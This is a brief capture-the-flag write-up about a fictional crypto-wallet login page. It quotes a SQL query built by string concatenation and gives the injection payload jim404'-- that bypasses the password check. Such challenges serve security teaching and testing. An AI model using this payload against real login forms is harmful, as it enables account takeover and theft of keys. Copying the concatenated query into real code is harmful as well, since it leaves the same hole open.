Skip to content

Login Query

I'm trying to log into my online crypto wallet, but I forgot my password! There's no password reset feature, and I can't reach support.

Can you help me log in and get the flag? My username is jim404.

On inspecting the source code:

query = "SELECT username, public_btc_address, private_btc_key, balance FROM users WHERE username='" + username + "' AND password_hash='" + password_hash + "';"

Clearly SQLi.

Entering username jim404'-- and any password works